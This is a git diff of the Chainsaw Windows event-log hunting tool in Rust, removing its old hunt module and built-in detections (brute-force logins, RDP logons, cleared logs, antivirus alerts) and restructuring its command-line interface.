modules::detect_sophos_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - }; - if let Some(d) = det { - if opt.json { - json_detections.push(det_to_json(d.clone(), r.data, "title")?); - } - hunt_detections.push(d); - det = None; - } - } - } - } - pb.inc(1); - } - // Finish the progress bar - pb.finish(); - // Print or Write results - if let Some(res) = post_process_hunt(grouped_events, &opt) { - for r in res { - hunt_detections.push(r); - } - }; - - if let Some(dir) = opt.csv { - save_hunt_results(dir, &hunt_detections)?; - } else if opt.json { - cs_print_json!(&json_detections)?; - } else { - print_hunt_results(&hunt_detections); - } - - Ok(format!("\n[+] {} Detections found", hunt_detections.len())) -} - -fn post_process_hunt( - grouped_events: HashMap>>, - hunts: &HuntOpts, -) -> Option> { - // This is where we run detection hunts which span across multiple event records - // e.g. detecting password spraying (multiple 4624 records) - // - // grouped_events format: HashMap>> - // - // Process 4625 Events - let mut results = Vec::new(); - if !hunts.disable_inbuilt_logic { - if let Some(a) = grouped_events.get(&4625) { - let detections = match modules::detect_login_attacks(a) { - Some(b) => b, - None => vec![], - }; - results.push(detections); - } - // Process 4624 Events - if let Some(a) = grouped_events.get(&4624) { - let detections = match modules::filter_lateral_movement(a, hunts) { - Some(b) => b, - None => vec![], - }; - results.push(detections); - } - } - if results.is_empty() { - return None; - } - Some(results.into_iter().flatten().collect()) -} - -fn print_hunt_results(detections: &[Detection]) { - // Create a uniq list of all hunt result titles so that we can aggregate - let detection_titles: &Vec = &detections - .iter() - .map(|x| x.title.clone()) - .unique() - .collect(); - let format = format::FormatBuilder::new() - .column_separator('│') - .borders('│') - .separators( - &[format::LinePosition::Top], - 
format::LineSeparator::new('─', '┬', '┌', '┐'), - ) - .separators( - &[format::LinePosition::Intern], - format::LineSeparator::new('─', '┼', '├', '┤'), - ) - .separators( - &[format::LinePosition::Bottom], - format::LineSeparator::new('─', '┴', '└', '┘'), - ) - .padding(1, 1) - .build(); - // Loop through uniq list of hunt results - for title in detection_titles { - let mut table = Table::new(); - table.set_format(format); - let mut header = false; - cs_greenln!("\n[+] Detection: {}", title); - - let mut unsorted_rows = vec![]; - // Loop through detection values and print in a table view - for detection in detections { - // Only group together results of the same hunt - if detection.title != *title { - continue; - } - if !header { - // Header builder - let mut headers = vec![]; - for c in &detection.headers { - let cell = cell!(c).style_spec("c"); - headers.push(cell); - } - table.add_row(Row::new(headers)); - header = true; - } - // Values builder - let mut values = vec![]; - for c in &detection.values { - values.push(c); - } - unsorted_rows.push(values); - } - - // Sort by timestamp to get into acending order - unsorted_rows.sort_by(|a, b| a.first().cmp(&b.first())); - - // This code block loops through rows and formats them into the prettytable-rs format - // I think this can be simplified down the line - let mut sorted_rows = vec![]; - for row in &unsorted_rows { - let mut values = vec![]; - for item in row { - values.push(cell!(item)); - } - sorted_rows.push(values) - } - - for row in sorted_rows { - table.add_row(Row::new(row)); - } - cs_print_table!(table); - } -} - -fn save_hunt_results(dir: PathBuf, detections: &[Detection]) -> Result<()> { - // Create a uniq list of all hunt result titles so that we can agg - let detection_titles: &Vec = &detections - .iter() - .map(|x| x.title.clone()) - .unique() - .collect(); - // Create output directory - create_dir_all(&dir)?; - // Loop through uniq list of hunt results - cs_println!(); - for title in 
detection_titles { - let mut header = false; - let mut unsorted_rows = vec![]; - // Build the final CSV filename - // TODO: This feels very hacky, maybe we shouldn't use the title for the filename in this way? - let mut filename = format!("{}.csv", title.replace(" ", "_").to_lowercase()); - if let Some(x) = filename.split('-').last() { - filename = x.to_string(); - if &filename[0..1] == "_" { - filename.remove(0); - } - } - let path = dir.join(&filename); - let mut writer = csv::Writer::from_path(path)?; - for detection in detections { - // Only group together results of the same hunt - if detection.title != *title { - continue; - } - if !header { - // Write headers to CSV - cs_eprintln!("[+] Created {}", filename); - writer.write_record(&detection.headers)?; - header = true; - } - // Values builder - let mut values = vec![]; - for c in &detection.values { - values.push(c); - } - unsorted_rows.push(values); - // Write values to CSV - } - unsorted_rows.sort_by(|a, b| a.first().cmp(&b.first())); - - let mut sorted_rows = vec![]; - for row in &unsorted_rows { - let mut values = vec![]; - for item in row { - values.push(item); - } - sorted_rows.push(values) - } - - for row in sorted_rows { - writer.write_record(row)?; - } - writer.flush()?; - } - Ok(()) -} - -pub fn get_mapping_file(path: &Path) -> Result { - let mapping: Mapping; - let md = metadata(&path)?; - if md.is_dir() { - return Err(anyhow!( - "Specified mapping file is a directory: '{}' - please specify a file", - path.display() - )); - }; - match File::open(&path) { - Ok(mut file) => { - let mut content = String::new(); - file.read_to_string(&mut content)?; - - match serde_yaml::from_str(&content) { - Ok(map) => mapping = map, - Err(error) => return Err(anyhow!("Error in {}: {}", path.display(), error)), - }; - } - Err(error) => { - return Err(anyhow!( - "Failed to load mapping file from {}: {}", - path.display(), - error - )); - } - } - match RuleType::from(&mapping.kind) { - Some(RuleType::Sigma) => {} - 
Some(RuleType::Stalker) => {} - None => { - return Err(anyhow!( - "Error in mapping file: '{}' is not a valid kind. 'stalker' or 'sigma' are supported options", - mapping.kind - )) - } - } - Ok(mapping) -} - -pub fn load_detection_rules( - path: &Path, - check: bool, - mapping: &Mapping, - verbose: bool, -) -> Result> { - let mut count = 0; - let mut failed = 0; - let mut chainsaw_rules: Vec = Vec::new(); - if path.exists() { - let md = metadata(&path)?; - if md.is_dir() { - // Grab all YML files from within the specified directory - let mut rule_files = Vec::new(); - for file in WalkDir::new(path) { - let file_a = file?; - if let Some(x) = file_a.path().extension() { - if x == "yml" || x == "yaml" { - rule_files.push(file_a.into_path()); - } - } - } - match RuleType::from(&mapping.kind) { - // Loop through yml files and confirm they're TAU rules - Some(RuleType::Sigma) => { - for path in rule_files { - let rules = match sigma::load(&path) { - Ok(rules) => rules, - Err(e) => { - failed += 1; - if check { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - if let Some(source) = e.source() { - cs_eprintln!("[!] {:?}: {} - {}", file_name, e, source); - } else { - cs_eprintln!("[!] {:?}: {}", file_name, e); - } - } - continue; - } - }; - if verbose { - for rule in &rules { - println!( - "{}", - serde_yaml::to_string(&rule).expect("could not serialise") - ); - } - } - for file in rules { - let rule: ChainsawRule = match serde_yaml::from_value(file) { - Ok(e) => e, - Err(e) => { - failed += 1; - if check { - let file_name = - match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!("[!] 
{:?}: {}", file_name, e); - } - continue; - } - }; - // Remove rules that are excluded in the mapping file - if let Some(exclusion) = &mapping.exclusions { - if exclusion.contains(&rule.tag) { - failed += 1; - if check { - let file_name = - match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!( - "[!] {:?} is excluded in mapping file", - file_name - ); - } - continue; - }; - }; - chainsaw_rules.push(rule); - count += 1; - } - } - } - Some(RuleType::Stalker) => { - for path in rule_files { - let rule: ChainsawRule = match stalker::load(&path) { - Ok(e) => e, - Err(e) => { - failed += 1; - if check { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!("[!] {:?}: {}", file_name, e); - } - continue; - } - }; - // Remove any < HIGH level rules - if let Some(level) = rule.level.clone() { - match level.as_str() { - "high" => {} - "critical" => {} - _ => continue, - }; - } - // Remove non-stable rules - if let Some(status) = rule.status.clone() { - match status.as_str() { - "stable" => {} - _ => continue, - }; - } - // Remove rules that are excluded in the mapping file - if let Some(exclusion) = &mapping.exclusions { - if exclusion.contains(&rule.tag) { - failed += 1; - if check { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - cs_eprintln!("[!] {:?} is excluded in mapping file", file_name); - } - continue; - }; - }; - chainsaw_rules.push(rule); - count += 1; - } - } - None => { - return Err(anyhow!( - "Error in mapping file: '{}' is not a valid rule kind", - mapping.kind - )) - } - } - } else { - return Err(anyhow!("Invalid input path: {}. 
The rule parameter requires a directory path containing detection rules", path.display())); - } - } else { - return Err(anyhow!("Invalid input path: {}", path.display())); - }; - if count == 0 && !check { - return Err(anyhow!( - "Rule directory specified, but no valid rules found!" - )); - } - if failed > 0 { - if check { - cs_eprintln!(); - } - cs_eprintln!( - "[+] Loaded {} detection rules ({} were not loaded)", - count, - failed - ); - } else { - cs_eprintln!("[+] Loaded {} detection rules", count); - } - Ok(chainsaw_rules) -} diff --git a/src/hunt/modules.rs b/src/hunt/modules.rs deleted file mode 100644 index 530ee8d7..00000000 --- a/src/hunt/modules.rs +++ /dev/null 
@@ -1,730 +0,0 @@ -use super::ChainsawRule; -use super::Detection; -use super::Events; -use super::HuntOpts; -use crate::util::RULE_PREFIX; -use regex::Regex; -use serde_json::Value; -use std::collections::HashMap; -use tau_engine::Value as Tau; -use tau_engine::{AsValue, Document}; -extern crate ajson; - -pub struct Wrapper<'a>(&'a serde_json::Value); -impl<'a> Document for Wrapper<'a> { - fn find(&self, key: &str) -> Option> { - self.0.get(key).map(|v| v.as_value()) - } -} - -fn split_tag(tag_name: String, target: usize) -> String { - let mut count = 0; - let mut chars = Vec::with_capacity(tag_name.len()); - for char in tag_name.chars() { - count += 1; - if count > target && char.is_whitespace() { - count = 0; - chars.push('\n'); - } else { - chars.push(char); - } - } - chars.into_iter().collect() -} - -fn get_tau_matches( - mut data: serde_json::Value, - chainsaw_rules: &[ChainsawRule], -) -> Option<(String, String)> { - let mut matches = vec![]; - let mut authors = vec![]; - - // TAU specific fix to make sure raw.ex.name is set to just the image name, not the full path - if let Some(name) = data.get("raw.ex.name") { - let re = Regex::new(r"([a-zA-Z0-9]+\.exe)").expect("Regex failed to build"); - if let Some(exe_name) = re.find(&name.to_string()) { - data["raw.ex.name"] = json!(exe_name.as_str()) - } - }; - // Check the doc for any tau rule matches - for rule in chainsaw_rules { - if rule.logic.matches(&Wrapper(&data)) { - if rule.tag.len() > 20 { - let title = split_tag(rule.tag.clone(), 20); - matches.push(format!("{}{}", RULE_PREFIX, title)); - } else { - matches.push(format!("{}{}", RULE_PREFIX, rule.tag.clone())); - } - // To comply to the sigma DRL we need to display rule author information - if let Some(x) = &rule.authors { - authors.push(format!("{}{}", RULE_PREFIX, x.join("\n"))) - } else { - authors.push(format!("{}Unknown", RULE_PREFIX)); - } - } else { - continue; - } - } - if matches.is_empty() { - return None; - } - // Flatten vec here - 
Some((matches.join("\n"), authors.join("\n"))) -} - -fn format_time(event_time: String) -> String { - let chunks = event_time.rsplit('.').last(); - match chunks { - Some(e) => e.replace("T", " ").replace('"', ""), - None => event_time, - } -} - -pub fn extract_logon_fields(event: &serde_json::value::Value) -> Option> { - // Extract the key fields from login events and load them into a struct and return - // We don't need to return column headers as they can be derived from the struct fields later - - let mut values = HashMap::new(); - values.insert( - "logon_type".to_string(), - event["Event"]["EventData"]["LogonType"].to_string(), - ); - values.insert( - "target_username".to_string(), - event["Event"]["EventData"]["TargetUserName"].to_string(), - ); - values.insert( - "workstation_name".to_string(), - event["Event"]["EventData"]["WorkstationName"].to_string(), - ); - values.insert( - "ip_address".to_string(), - event["Event"]["EventData"]["IpAddress"].to_string(), - ); - values.insert( - "computer".to_string(), - event["Event"]["System"]["Computer"].to_string(), - ); - values.insert( - "system_time".to_string(), - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - ); - values.insert( - "process_name".to_string(), - event["Event"]["EventData"]["ProcessName"].to_string(), - ); - Some(values) -} - -pub fn detect_created_users(event: &serde_json::value::Value, event_id: &u64) -> Option { - let title = String::from("(Built-in Logic) - New User Created"); - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "target_username".to_string(), - "user_sid".to_string(), - ]; - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - event_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - event["Event"]["EventData"]["TargetUserName"].to_string(), - event["Event"]["EventData"]["TargetSid"].to_string(), - ]; - let ret 
= Detection { - headers, - title, - values, - }; - - Some(ret) -} - -fn format_field_length(mut data: String, full_output: &bool, length: usize) -> String { - // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. - // If this is a scheduled task we need to parse the XML to make it more readable - - data = data - .replace("\n", "") - .replace("\r", "") - .replace("\t", "") - .replace(" ", " ") - .chars() - .collect::>() - .chunks(length) - .map(|c| c.iter().collect::()) - .collect::>() - .join("\n"); - - let truncate_len = 1000; - - if !*full_output && data.len() > truncate_len { - data.truncate(truncate_len); - data.push_str("...\n\n(use --full to show all content)"); - } - data -} - -pub fn detect_tau_matches( - event: &serde_json::value::Value, - event_id: u64, - chainsaw_rules: &[ChainsawRule], - id_mappings: &HashMap, - full_output: &bool, - col_width: i32, - show_authors: &bool, -) -> Option { - let command_line; - let mut headers = vec![]; - let title; - - // Build JSON doc dynamically from the fields provided in the mapping file - let mut doc = json!({}); - match id_mappings.get(&event_id) { - Some(fields) => { - // Get the provider and make sure it matches the mapping file this EventID - // This allows us to make sure that we don't process EventIDs from other providers - if let Some(provider) = - ajson::get(&event.to_string(), "Event.System.Provider_attributes.Name") - { - if provider.to_string() != fields.provider { - return None; - } - } else { - //cs_eprintln!("ERROR Could not find provider") - return None; - } - - // Loop through every specified field and attempt to match to the current event doc - for (k, v) in &fields.search_fields { - let h = match ajson::get(&event.to_string(), v) { - Some(h) => h.to_string(), - None => { - // cs_eprintln!("{} - could not match: {}", event_id, v); - // cs_eprintln!("{:?}", event); - continue; - } - }; - doc[k] = json!(h); - } - doc["EventID"] = json!(event_id); - - // 
Find the context_field and extract it's value from the event - command_line = match fields.table_headers.get("context_field") { - Some(a) => match ajson::get(&event.to_string(), a) { - Some(v) => { - if v.to_string().is_empty() { - "".to_string() - } else { - format_field_length(v.to_string(), full_output, col_width as usize) - } - } - None => "context_field not found!".to_string(), - }, - None => "context_field not set".to_string(), - }; - } - None => return None, - }; - - let (hits, authors) = match get_tau_matches(doc, chainsaw_rules) { - Some(ret) => ret, - None => return None, - }; - - let mut values = vec![]; - match id_mappings.get(&event_id) { - Some(fields) => { - // Set table title - title = format!("(External Rule) - {}", fields.title.clone()); - - // The first column should always be the system time - headers.push("system_time".to_string()); - match ajson::get( - &event.to_string(), - "Event.System.TimeCreated_attributes.SystemTime", - ) { - // The normal event time includes milliseconds which is un-necessary - Some(time) => { - values.push(format_time(time.to_string())); - } - None => values.push("".to_string()), - } - // Set hardcoded table headers and values - headers.push("id".to_string()); - headers.push("detection_rules".to_string()); - if *show_authors { - headers.push("rule_authors".to_string()); - } - headers.push("computer_name".to_string()); - match fields.table_headers.get("context_field") { - Some(v) => headers.push(v.to_string()), - None => headers.push("context_field".to_string()), - }; - - values.push(event_id.to_string()); - values.push(hits); - if *show_authors { - values.push(authors); - } - values.push(event["Event"]["System"]["Computer"].to_string()); - values.push(command_line); - for (k, v) in &fields.table_headers { - if k == "context_field" { - continue; - } - // Insert the table headers - headers.push(k.to_string()); - // Insert the table values - match ajson::get(&event.to_string(), v) { - Some(b) => { - let b = b.to_string(); 
- if b.is_empty() { - values.push("".to_string()) - } else { - values.push(format_field_length(b, full_output, col_width as usize)) - } - } - None => values.push("Invalid Mapping".to_string()), - }; - } - } - None => return None, - } - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_group_changes(event: &serde_json::value::Value, e_id: &u64) -> Option { - let group = event["Event"]["EventData"]["TargetUserName"].to_string(); - - // Filter for Admin groups and RDP groups - if !group.contains("Admin") && !group.contains("Remote Desktop") { - return None; - } - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "change_type".to_string(), - "user_sid".to_string(), - "target_group".to_string(), - ]; - let title = String::from("(Built-in Logic) - User added to interesting group"); - - let change_type; - match e_id { - 4728 => change_type = "User added to global group".to_string(), - 4732 => change_type = "User added to local group".to_string(), - 4756 => change_type = "User added to universal group".to_string(), - _ => return None, - } - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - change_type, - event["Event"]["EventData"]["MemberSid"].to_string(), - event["Event"]["EventData"]["TargetUserName"].to_string(), - ]; - - // Build detection to return - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_cleared_logs(event: &serde_json::value::Value, e_id: &u64) -> Option { - if event["Event"]["UserData"]["LogFileCleared"]["SubjectUserName"].is_null() { - return None; - } - - let mut headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "subject_user".to_string(), - ]; - - let mut values = vec![ - 
format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - event["Event"]["UserData"]["LogFileCleared"]["SubjectUserName"].to_string(), - ]; - - let title = match e_id { - 1102 => "(Built-in Logic) - Security audit log was cleared".to_string(), - 104 => { - headers.push("channel".to_string()); - values.push(event["Event"]["UserData"]["LogFileCleared"]["Channel"].to_string()); - "(Built-in Logic) - System log was cleared".to_string() - } - _ => return None, - }; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_stopped_service( - event: &serde_json::value::Value, - event_id: &u64, -) -> Option { - let action = event["Event"]["EventData"]["param2"].to_string(); - let service_name = event["Event"]["EventData"]["param1"].to_string(); - let title = String::from("(Built-in Logic) - Event Log Service Stopped"); - - // Only check for the windows event logs service being stopped - // We can add more services here as needed - if !service_name.contains("Windows Event Log") || !action.contains("disabled") { - return None; - } - - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "service_name".to_string(), - "status".to_string(), - ]; - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - event_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - service_name, - action, - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_defender_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_name".to_string(), - "threat_file".to_string(), - "user".to_string(), - ]; - let title = 
String::from("(Built-in Logic) - Windows Defender Detections"); - - let mut threat_path = event["Event"]["EventData"]["Path"].to_string(); - - threat_path = format_field_length(threat_path, &full_output, col_width as usize); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - event["Event"]["EventData"]["Threat Name"].to_string(), - threat_path, - event["Event"]["EventData"]["Detection User"].to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_ultralight_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_name".to_string(), - "threat_file".to_string(), - "sha1".to_string(), - ]; - let title = String::from("(Built-in Logic)) - F-Secure AV Detections"); - - // Access F-Secure detection data which is in a nested json string - let detection_data = match event["Event"]["EventData"]["rv"].as_str() { - Some(x) => match serde_json::from_str::(x) { - Ok(y) => y, - Err(_) => return None, - }, - None => return None, - }; - - let threat_path = format_field_length( - detection_data["obj"]["ref"].to_string(), - &full_output, - col_width as usize, - ); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - detection_data["iname"].to_string(), - threat_path, - detection_data["obj"]["sha1"].to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_kaspersky_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - 
"id".to_string(), - "computer".to_string(), - "threat_file".to_string(), - "threat_name".to_string(), - ]; - let title = String::from("(Built-in Logic) - Kaspersky AV Detections"); - - let threat_path; - let threat_name; - - // Kaspersky puts the relevant data in a Vec. Here we locate it and extract the key fields - if let Some(threat_data) = ajson::get(&event.to_string(), "Event.EventData.Data") { - threat_path = match threat_data.to_vec().get(0) { - Some(a) => a.clone(), - None => return None, - }; - threat_name = match threat_data.to_vec().get(1) { - Some(a) => a.clone(), - None => return None, - } - } else { - return None; - } - - let threat_path = - format_field_length(threat_path.to_string(), &full_output, col_width as usize); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - threat_path, - threat_name.to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_sophos_detections( - event: &serde_json::value::Value, - e_id: &u64, - full_output: bool, - col_width: i32, -) -> Option { - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "computer".to_string(), - "threat_type".to_string(), - "threat_file".to_string(), - "threat_name".to_string(), - ]; - let title = String::from("(Built-in Logic) - Sophos AV Detections"); - - let threat_path; - let threat_name; - let threat_type; - - // Sophos puts the relevant data in a Vec. 
Here we locate it and extract the key fields - if let Some(threat_data) = ajson::get(&event.to_string(), "Event.EventData.Data") { - threat_type = match threat_data.to_vec().get(0) { - Some(a) => a.clone(), - None => return None, - }; - threat_path = match threat_data.to_vec().get(1) { - Some(a) => a.clone(), - None => return None, - }; - threat_name = match threat_data.to_vec().get(2) { - Some(a) => a.clone(), - None => return None, - } - } else { - return None; - } - - let threat_path = - format_field_length(threat_path.to_string(), &full_output, col_width as usize); - - let values = vec![ - format_time(event["Event"]["System"]["TimeCreated_attributes"]["SystemTime"].to_string()), - e_id.to_string(), - event["Event"]["System"]["Computer"].to_string(), - threat_type.to_string(), - threat_path, - threat_name.to_string(), - ]; - - let ret = Detection { - headers, - title, - values, - }; - - Some(ret) -} - -pub fn detect_login_attacks(events: &[HashMap]) -> Option> { - let mut logon_tracker = HashMap::new(); - let failed_limit = 5; - - // Add up number of failed logins for each user - for event in events { - let username = event["target_username"].clone(); - if username == "null" { - continue; - } - *logon_tracker.entry(username).or_insert(0) += 1; - } - - // Filter out accounts below failed limit - logon_tracker.retain(|_, v| *v > failed_limit); - - if logon_tracker.keys().len() == 0 { - return None; - } - - let mut results = vec![]; - - //Account Brute Forcing - for (username, count) in &logon_tracker { - let title = String::from("(Built-in Logic) - Account Brute Forcing"); - - let headers = vec![ - "id".to_string(), - "username".to_string(), - "failed_login_count".to_string(), - ]; - - let values = vec!["4625".to_string(), username.clone(), count.to_string()]; - let ret = Detection { - headers, - title, - values, - }; - results.push(ret); - } - Some(results) -} - -pub fn filter_lateral_movement( - events: &[HashMap], - hunts: &HuntOpts, -) -> Option> { - let mut 
results = vec![]; - - // Create a hashmap of logon types we will include - let mut logon_types = HashMap::new(); - let mut title = String::from("(Built-in Logic) - RDP Logins"); - - logon_types.insert("10".to_string(), "rdp (type 10)"); - - if hunts.lateral_all { - logon_types.insert("2".to_string(), "interactive (type 2)"); - logon_types.insert("3".to_string(), "network (type 3)"); - logon_types.insert("4".to_string(), "batch (type 4)"); - logon_types.insert("5".to_string(), "service (type 5)"); - logon_types.insert("7".to_string(), "unlock (type 7)"); - title = String::from("4624 Logins"); - } - - for event in events { - if !logon_types.contains_key(&event["logon_type"]) { - continue; - } - - // Only show results where there's a source IP, this removes local events that cause noise - if event["ip_address"] == "\"-\"" - || event["ip_address"] == "\"127.0.0.1\"" - || event["ip_address"] == "\"::1\"" - { - continue; - } - - // Filter out machine accounts to reduce noise - if event["target_username"].to_string().ends_with("$\"") { - continue; - } - - let headers = vec![ - "system_time".to_string(), - "id".to_string(), - "workstation_name".to_string(), - "target_username".to_string(), - "source_ip".to_string(), - "logon_type".to_string(), - ]; - let values = vec![ - event["system_time"].to_string(), - "4624".to_string(), - event["workstation_name"].to_string(), - event["target_username"].to_string(), - event["ip_address"].to_string(), - logon_types.get(&event["logon_type"])?.to_string(), - ]; - let ret = Detection { - headers, - title: title.clone(), - values, - }; - results.push(ret); - } - - Some(results) -} diff --git a/src/lib.rs b/src/lib.rs index 7965b8b5..5ed06265 100644 --- a/src/lib.rs +++ b/src/lib.rs 
@@ -1,23 +1,20 @@
 #[macro_use]
 extern crate anyhow;
-extern crate evtx;
-extern crate failure;
-#[macro_use]
-extern crate prettytable;
-extern crate rayon;
-extern crate serde;
-#[macro_use]
-extern crate serde_derive;
-extern crate serde_yaml;
-#[macro_use]
-extern crate serde_json;
-extern crate chrono;
-extern crate structopt;
+
+pub(crate) use anyhow::Result;
+
+pub use file::{evtx, get_files, Reader};
+pub use hunt::{Detection, Hunter, HunterBuilder};
+pub use rule::{lint_rule, load_rule, Kind as RuleKind};
+pub use search::{Searcher, SearcherBuilder};
+pub use write::{set_writer, Format, Writer, WRITER};
 
 #[macro_use]
-pub mod write;
-pub mod check;
-pub mod convert;
-pub mod hunt;
-pub mod search;
-pub mod util;
+mod write;
+
+pub mod cli;
+mod ext;
+mod file;
+mod hunt;
+mod rule;
+mod search;
diff --git a/src/main.rs b/src/main.rs
index 812e8c7b..f09053b4 100644
--- a/src/main.rs
+++ b/src/main.rs
@@ -1,34 +1,151 @@ -use anyhow::Result; -use std::fs::File; +#[macro_use] +extern crate chainsaw; -// TODO: Clean this, we have crudely split into a lib for testing purposes, this needs refinement. -use chainsaw::*; +use std::fs::File; +use std::path::PathBuf; +use anyhow::Result; +use chrono::NaiveDateTime; +use chrono_tz::Tz; use structopt::StructOpt; +use chainsaw::{ + cli, get_files, lint_rule, load_rule, set_writer, Format, Hunter, RuleKind, Searcher, Writer, +}; + #[derive(StructOpt)] #[structopt( name = "chainsaw", about = "Rapidly Search and Hunt through windows event logs" )] struct Opts { + /// Hide Chainsaw's banner. + #[structopt(long)] + no_banner: bool, #[structopt(subcommand)] - cmd: Chainsaw, + cmd: Command, } #[derive(StructOpt)] -enum Chainsaw { - /// Hunt through event logs using detection rules and builtin logic - #[structopt(name = "hunt")] - Hunt(hunt::HuntOpts), +enum Command { + /// Hunt through event logs using detection rules and builtin logic. + Hunt { + /// The path to a collection of rules. + rules: PathBuf, + + /// The paths to hunt through. + path: Vec, + + /// A mapping file to hunt with. + #[structopt(short = "m", long = "mapping", number_of_values = 1)] + mapping: Option>, + /// Additional rules to hunt with. + #[structopt(short = "r", long = "rule", number_of_values = 1)] + rule: Option>, + + /// Set the column width for the tabular output. + #[structopt(long = "column-width", conflicts_with = "json")] + column_width: Option, + /// Only hunt through files with the provided extension. + #[structopt(long = "extension")] + extension: Option, + /// The timestamp to hunt from. Drops any documents older than the value provided. + #[structopt(long = "from")] + from: Option, + /// Print the full values for the tabular output. + #[structopt(long = "full", conflicts_with = "json")] + full: bool, + /// Print the output in json format. 
+ #[structopt(group = "format", long = "json")] + json: bool, + /// Allow chainsaw to try and load files it cannot identify. + #[structopt(long = "load-unknown")] + load_unknown: bool, + /// Output the timestamp using the local machine's timestamp. + #[structopt(long = "local", group = "tz")] + local: bool, + /// Apply addional metadata for the tablar output. + #[structopt(long = "metadata", conflicts_with = "json")] + metadata: bool, + /// The file to output to. + #[structopt(short = "o", long = "output")] + output: Option, + /// Supress informational output. + #[structopt(short = "q")] + quiet: bool, + /// Continue to hunt when an error is encountered. + #[structopt(long = "skip-errors")] + skip_errors: bool, + /// Output the timestamp using the timezone provided. + #[structopt(long = "timezone", group = "tz")] + timezone: Option, + /// The timestamp to hunt up to. Drops any documents newer than the value provided. + #[structopt(long = "to")] + to: Option, + }, + + /// Lint provided rules to ensure that they load correctly + Lint { + /// The path to a collection of rules. + path: PathBuf, + /// The kind of rule to lint. + #[structopt(long = "kind", default_value = "chainsaw")] + kind: RuleKind, + }, /// Search through event logs for specific event IDs and/or keywords - #[structopt(name = "search")] - Search(search::SearchOpts), + Search { + /// A pattern to search for. + #[structopt(required_unless = "regexp")] + pattern: Option, + + /// The paths to search through. + path: Vec, - /// Validate provided detection rules to ensure they load correctly - #[structopt(name = "check")] - Check(check::CheckOpts), + /// A pattern to search for. + #[structopt(short = "e", long = "regexp", number_of_values = 1)] + regexp: Option>, + + /// Only search through files with the provided extension. + #[structopt(long = "extension")] + extension: Option, + /// The timestamp to search from. Drops any documents older than the value provided. 
+ #[structopt(long = "from")] + from: Option, + /// Ignore the case when searching patterns + #[structopt(short = "i", long = "ignore-case")] + ignore_case: bool, + /// Print the output in json format. + #[structopt(long = "json")] + json: bool, + /// Allow chainsaw to try and load files it cannot identify. + #[structopt(long = "load-unknown")] + load_unknown: bool, + /// Output the timestamp using the local machine's timestamp. + #[structopt(long = "local", group = "tz")] + local: bool, + /// The file to output to. + #[structopt(short = "o", long = "output")] + output: Option, + /// Supress informational output. + #[structopt(short = "q")] + quiet: bool, + /// Continue to search when an error is encountered. + #[structopt(long = "skip-errors")] + skip_errors: bool, + /// Tau expressions to search with. + #[structopt(short = "t", long = "tau")] + tau: Option>, + /// The field that contains the timestamp. + #[structopt(long = "timestamp", requires_if("from", "to"))] + timestamp: Option, + /// Output the timestamp using the timezone provided. + #[structopt(long = "timezone", group = "tz")] + timezone: Option, + /// The timestamp to search up to. Drops any documents newer than the value provided. + #[structopt(long = "to")] + to: Option, + }, } fn print_title() { 
